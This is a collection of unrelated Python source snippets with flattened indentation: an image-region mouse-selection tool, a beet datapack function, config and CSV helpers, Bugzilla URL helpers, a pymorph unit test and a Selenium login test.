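    print(space.from_jsonable(space.to_jsonable(x)))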
|
504126 | from PIL import Image
from PIL import ImageDraw
import numpy as np
import matplotlib.pyplot as plt
from Utils import joinPath, saveData, setDir
from PlotTools import plotMyFigureOnAxes
def extractSelectedRegion(selected_data):
img_array = selected_data['image_array']
W_R = int(selected_data['W_R'])
H_R = int(selected_data['H_R'])
# import pdb
# pdb.set_trace()
return np.array([img_array[x[1]-H_R:x[1]+H_R, x[0]-W_R:x[0]+W_R] for x in selected_data['selection']['regions']])
def redrawFromSelectedData(ax, selected_data, circle_R=3):
redraw(ax, Image.fromarray(selected_data['image_array']),
selected_data['selection'],
selected_data['W_R'],
selected_data['H_R'],
circle_R)
def redraw(ax, img, selection, W_R, H_R, circle_R):
"""Redraw image presented in numpy format(img) on Matplotlib Axes(ax)
:ax : Matplotlib axes, where to draw image
:img : Pillow Image Object
:selection: {'regions':[], 'count':int}, regions contain the regions to draw
:W_R : int, half of window width
:H_R : int, half of window height
"""
ax.cla()
img_rgb = img.convert(mode='RGB')
draw = ImageDraw.Draw(img_rgb)
for idx, lb in enumerate(selection['regions']):
if lb[2]==0: # branch
# The box is a 4-tuple defining the left, upper, right, and lower pixel coordinate
draw.rectangle([lb[0]-W_R, lb[1]-H_R, lb[0]+W_R, lb[1]+H_R]
,outline="red")
draw.ellipse([lb[0]-circle_R, lb[1]-circle_R, lb[0]+circle_R, lb[1]+circle_R]
, fill="red", outline=None) # "red"
draw.text((lb[0]-W_R,lb[1]-H_R), '{0}'.format(idx), fill='yellow')
else: # nonbranch
draw.rectangle([lb[0]-W_R, lb[1]-H_R, lb[0]+W_R, lb[1]+H_R]
,outline="green")
draw.ellipse([lb[0]-circle_R, lb[1]-circle_R, lb[0]+circle_R, lb[1]+circle_R]
, fill="green", outline=None) # "green"
draw.text((lb[0]-W_R,lb[1]-H_R), '{0}'.format(idx), fill='yellow')
del draw
plotMyFigureOnAxes(ax, np.asarray(img_rgb))
# im = ax.imshow()
# fig = ax.figure
# fig.subplots_adjust(right=0.8)
# cbar_ax = fig.add_axes([0.85, 0.15, 0.05, 0.7])
# fig.colorbar(im, cax=cbar_ax)
def checkBoxInside(img_size, x, y, box_w, box_h):
    '''checkBoxInside: Check whether the mouse-selected box lies entirely inside the image.
Args:
img_size (tuple(int,int)): image size (width, height).
x (int): x position of box.
y (int): y position of box.
box_w (int): width of box.
box_h (int): height of box.
Returns:
bool: Whether box is inside this image.
'''
left = x-box_w
right = x+box_w
up = y-box_h
down = y+box_h
return left>=0 and right<=img_size[0] and up>=0 and down<=img_size[1]
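# Worked example (hypothetical numbers): for an image of size (100, 80), a box centred
# at (10, 10) with box_w = box_h = 15 reaches left = 10 - 15 = -5 < 0, so the check is
# False; the same box centred at (50, 40) spans [35, 65] x [25, 55], which fits, so it
# returns True.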
def mouseSample(dst_pckl_path, src_dir, img_name, W_R, H_R, circle_R):
"""mouseSample, use mouse to select [2*W_R, 2*H_R] windows in images
:dst_pckl_path : string, destination path to store extracted variables
:src_dir : string, source dir of image
:img_name : string, image name
:W_R : int, half window width
:H_R : int , half window height
    :circle_R : int, radius of the circle drawn on the image
"""
setDir(dst_pckl_path)
img_path = joinPath(src_dir, img_name)
img = Image.open(img_path)
print('Image size: {}'.format(img.size))
img_size = img.size
img_array = np.asarray(img)
selection = {'regions':[], 'count':0}
# fig_a and fig_b are created differently for each different image
# and it's okay they are load simultaneously
fig_a = plt.figure()
fig_a.clf()
fig_a_ax = fig_a.add_subplot(111)
plotMyFigureOnAxes(fig_a_ax, img_array)
# fig_a_ax.imshow(img_array, cmap='Greys_r')
fig_b = plt.figure()
fig_b.clf()
fig_b_ax = fig_b.add_subplot(111)
cids = []
def onclick(event, selection, W_R, H_R, circle_R):
center_x = int(event.xdata)
center_y = int(event.ydata)
fig_b_ax.cla()
if checkBoxInside(img_size, center_x, center_y, W_R, H_R):
window = img_array[center_y-H_R:center_y+H_R, center_x-W_R:center_x+W_R]
window_img = Image.fromarray(window)
window_arr = np.asarray(window_img)
plotMyFigureOnAxes(fig_b_ax, window_arr)
# fig_b_ax.imshow(window_arr,cmap='Greys_r')
fig_b_ax.text(0,0.4,'img{0}, ({1},{2})'.format(selection['count'], center_x, center_y), color='r')
selection['count'] += 1
selection['regions'].append((center_x, center_y, 0))
redraw(fig_a_ax, img, selection, W_R, H_R, circle_R)
else:
fig_b_ax.text(0,0.4,'The box is outside of image', color='r')
def on_key(event, ax, cids):
if event.key=='ctrl+alt+n':
for cid in cids:
ax.figure.canvas.mpl_disconnect(cid)
# Save data into a pickl file
selected_data = {}
selected_data['selection'] = selection
selected_data['image_array'] = img_array
selected_data['img_name'] = img_name
selected_data['W_R'] = W_R
selected_data['H_R'] = H_R
save_pickl_file_name = '_'.join(img_name.split('.')[:-1]).replace('/', '_')
save_pickl_file_name += '.pckl'
print('saved pickl file name: {}'.format(save_pickl_file_name))
saveData([selected_data], joinPath(dst_pckl_path, save_pickl_file_name))
# Notify
            fig_a_ax.text(0,0.4,'Finished mouse selection', color='r')
# Register event handler
cids.append(fig_a_ax.figure.canvas.mpl_connect('button_press_event', lambda event: onclick(event, selection, W_R, H_R, circle_R)))
cids.append(fig_a_ax.figure.canvas.mpl_connect('key_press_event', lambda event: on_key(event, fig_a_ax, cids)))
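if __name__ == '__main__':
    # Example invocation (hypothetical paths and window sizes): click regions on the
    # image, then press 'ctrl+alt+n' to save the selection as a pickle in dst_pckl_path.
    mouseSample(dst_pckl_path='./selected_regions',
                src_dir='./images',
                img_name='example.png',
                W_R=16, H_R=16, circle_R=3)
    plt.show()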
|
504129 | from beet import Context, Function
def beet_default(ctx: Context):
message = "potato"
with ctx.generate.draft() as draft:
draft.data["demo:foo"] = Function(["say hello"])
with ctx.generate.draft() as draft:
draft.cache("demo", f"{message=}", zipped=True)
draft.data["demo:message"] = Function([f"say {message}"])
ctx.data.functions["demo:message"].lines *= 2
|
504143 | class Config():
def __init__(self, koji_host, koji_storage_host, arch, result_dir):
self.koji_host = koji_host
self.koji_storage_host = koji_storage_host
self.arch = arch
self.result_dir = result_dir
|
504160 | import pymorph
import numpy as np
def test_cthin():
f = np.arange(16*16).reshape((16,16))%8
g = (f > 2)
f = (f > 3)
t = pymorph.cthin(f,g)
assert not np.any( ~g & t )
|
504171 | from remo.remozilla.models import Bug, Status
def get_last_updated_date():
"""Get last successful Bugzilla sync datetime."""
status, created = Status.objects.get_or_create(pk=1)
return status.last_updated
def set_last_updated_date(date):
"""Set last successful Bugzilla sync datetime."""
status, c = Status.objects.get_or_create(pk=1)
status.last_updated = date
status.save()
return status.last_updated
def get_bugzilla_url(obj):
if not isinstance(obj, Bug):
return ''
url = 'https://bugzilla.mozilla.org/show_bug.cgi?id='
return url + '{0}'.format(obj.bug_id)
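# Example: for a Bug instance with bug_id = 123456, get_bugzilla_url() returns
# 'https://bugzilla.mozilla.org/show_bug.cgi?id=123456'; any non-Bug argument yields ''.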
|
504184 | from .random_forest_oracle import RandomForestOracle
from .gaussian_process_oracle import GaussianProcessOracle
|
504188 | from datetime import datetime
class csv_utils:
    @staticmethod
    def coalesce_date(date):
        return "" if date is None else datetime.strftime(date, '%Y-%m-%d %H:%M:%S')
    @staticmethod
    def coalesce_bool(field):
        return "" if field is None else "true" if field is True else "false"
    @staticmethod
    def coalesce_int(num):
        return "" if num is None else str(num)
|
504270 | from __future__ import print_function, unicode_literals
import unittest
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from base import SeleniumBaseTest
import os
print ("[DBG]: Running test from: {0}".format(os.getcwd()))
# Fix the path if we are running with the file's folder as working folder.
# (The actual working folder should be "src")
cur_cwd = os.getcwd()
if cur_cwd.endswith(os.path.sep + "selenium"):
os.chdir(os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..")))
print ("[DBG]: Running test from: {0}".format(os.getcwd()))
class TestLogin(SeleniumBaseTest):
def __init__(self, *args, **kwargs):
super(TestLogin, self).__init__(*args, **kwargs)
def setUp(self):
super(TestLogin, self).setUp()
def tearDown(self):
super(TestLogin, self).tearDown()
self.driver.get_screenshot_as_file('last_screenshot.png')
def _login(self):
self.driver.get(self.core_server_url)
username = self.driver.find_element_by_id("username")
password = self.driver.find_element_by_id("password")
login = self.driver.find_element_by_id("login")
# Login
username.send_keys("any")
password.send_keys("password")
login.click()
WebDriverWait(self.driver, 10).until(
EC.invisibility_of_element_located((By.CSS_SELECTOR, ".rotating-ball"))
)
def test_login(self):
self._login()
# Verify that we landed in My Experiments
my_exps_h3 = self.driver.find_element_by_css_selector("center h2")
self.assertEqual(my_exps_h3.text, "My Experiments")
# Verify that we have several Experiments in the page
my_exps = self.driver.find_elements_by_css_selector(".lab-block")
self.assertGreater(len(my_exps), 0)
def test_logout(self):
# We need to login first.
self._login()
# Logout
logout = self.driver.find_element_by_id('logout')
logout.click()
        # Ensure that we have managed to log out: the login form's password field should
        # be present again (find_element raises NoSuchElementException if it is not).
        self.driver.find_element_by_id("password")
if __name__ == "__main__":
unittest.main() |